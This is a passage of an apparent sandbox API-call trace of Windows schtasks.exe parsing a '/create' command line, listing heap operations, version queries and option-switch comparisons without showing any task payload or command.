(HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c9618) returned 1 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] GetProcessHeap () returned 0x5c0000 [0305.288] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c79f0) returned 1 [0305.289] GetProcessHeap () returned 0x5c0000 [0305.289] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c79f0) returned 0x10 [0305.289] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c79f0) returned 1 [0305.289] RtlRestoreLastWin32Error () returned 0x0 [0305.289] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0305.289] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0305.289] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0305.289] RtlVerifyVersionInfo (VersionInfo=0xccb38, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0305.289] RtlRestoreLastWin32Error () returned 0x0 [0305.290] lstrlenW (lpString="create") returned 6 [0305.290] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0305.290] RtlRestoreLastWin32Error () returned 0x490 [0305.290] RtlRestoreLastWin32Error () returned 0x0 [0305.290] lstrlenW (lpString="create") returned 6 [0305.290] GetProcessHeap () returned 0x5c0000 [0305.290] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9698 [0305.290] GetProcessHeap () returned 0x5c0000 [0305.290] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5ca280 [0305.290] _memicmp (_Buf1=0x5ca280, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.290] GetProcessHeap () returned 0x5c0000 [0305.290] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x16) returned 0x5c95f8 [0305.290] RtlRestoreLastWin32Error () returned 0x0 [0305.290] _memicmp (_Buf1=0x5c78a0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.290] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c8f90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0305.290] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xccc44 | out: lpdwHandle=0xccc44) returned 0x76c [0305.290] GetProcessHeap () returned 0x5c0000 [0305.291] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x776) returned 0x5cacd8 [0305.291] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x5cacd8 | out: lpData=0x5cacd8) returned 1 [0305.291] VerQueryValueW (in: pBlock=0x5cacd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xccc4c, puLen=0xccc50 | out: lplpBuffer=0xccc4c*=0x5cb088, puLen=0xccc50) returned 1 [0305.291] _memicmp (_Buf1=0x5c78a0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.291] _vsnwprintf (in: _Buffer=0x5c8f90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xccc30 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0305.291] VerQueryValueW (in: pBlock=0x5cacd8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xccc5c, puLen=0xccc58 | out: lplpBuffer=0xccc5c*=0x5caeb8, puLen=0xccc58) returned 1 [0305.291] lstrlenW (lpString="schtasks.exe") returned 12 [0305.291] lstrlenW (lpString="schtasks.exe") returned 12 [0305.291] lstrlenW (lpString=".EXE") returned 4 [0305.291] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0305.291] lstrlenW (lpString="schtasks.exe") returned 12 [0305.291] lstrlenW (lpString=".EXE") returned 4 [0305.291] lstrlenW (lpString="schtasks") returned 8 [0305.291] lstrlenW (lpString="/create") returned 7 [0305.291] _memicmp (_Buf1=0x5c78a0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.291] _vsnwprintf (in: _Buffer=0x5c8f90, _BufferCount=0x19, _Format="%s %s", _ArgList=0xccc30 | out: _Buffer="schtasks /create") returned 16 [0305.292] _memicmp (_Buf1=0x5c78b8, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.292] GetProcessHeap () returned 0x5c0000 [0305.292] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c97b8 [0305.292] _memicmp (_Buf1=0x5c7960, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.292] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5caad0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0305.292] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0305.292] GetProcessHeap () returned 0x5c0000 [0305.292] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x30) returned 0x5c9248 [0305.292] _vsnwprintf (in: _Buffer=0x5c91a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xccc34 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0305.292] GetProcessHeap () returned 0x5c0000 [0305.292] GetProcessHeap () returned 0x5c0000 [0305.292] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5cacd8) returned 1 [0305.292] GetProcessHeap () returned 0x5c0000 [0305.292] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5cacd8) returned 0x776 [0305.292] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cacd8) returned 1 [0305.292] RtlRestoreLastWin32Error () returned 0x0 [0305.292] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="create") returned 6 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="?") returned 1 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="s") returned 1 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="u") returned 1 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="p") returned 1 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="ru") returned 2 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="rp") returned 2 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="sc") returned 2 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="mo") returned 2 [0305.293] GetThreadLocale () returned 0x409 [0305.293] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.293] lstrlenW (lpString="d") returned 1 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="m") returned 1 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="i") returned 1 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="tn") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="tr") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="st") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="sd") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="ed") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="it") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="et") returned 2 [0305.294] GetThreadLocale () returned 0x409 [0305.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.294] lstrlenW (lpString="k") returned 1 [0305.295] GetThreadLocale () returned 0x409 [0305.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.295] lstrlenW (lpString="du") returned 2 [0305.295] GetThreadLocale () returned 0x409 [0305.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.295] lstrlenW (lpString="ri") returned 2 [0305.295] GetThreadLocale () returned 0x409 [0305.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.295] lstrlenW (lpString="z") returned 1 [0305.295] GetThreadLocale () returned 0x409 [0305.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.295] lstrlenW (lpString="f") returned 1 [0305.295] GetThreadLocale () returned 0x409 [0305.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0305.295] lstrlenW (lpString="v1") returned 2 [0305.295] GetThreadLocale () returned 0x409 [0305.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount